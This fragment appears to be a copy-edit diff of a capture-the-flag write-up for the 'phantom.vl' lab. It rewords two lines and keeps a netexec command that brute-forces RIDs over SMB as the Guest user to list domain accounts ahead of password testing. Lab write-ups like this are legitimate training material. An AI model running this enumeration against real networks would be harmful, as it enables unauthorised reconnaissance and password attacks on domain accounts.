Skip to main content

 #

-Before testing the password, we need to obtain the list of domain users.
-Let’s use a RID brute force attack:
+Before testing the password, a list of domain users is needed.
+A RID brute force attack provides exactly that:

 elliot@exegol:~$ nxc smb phantom.vl -u 'Guest' -p '' --rid-brute | grep 'SidTypeUser' | cut -d'\' -f2 | cut -d' ' -f1 > users_list.txt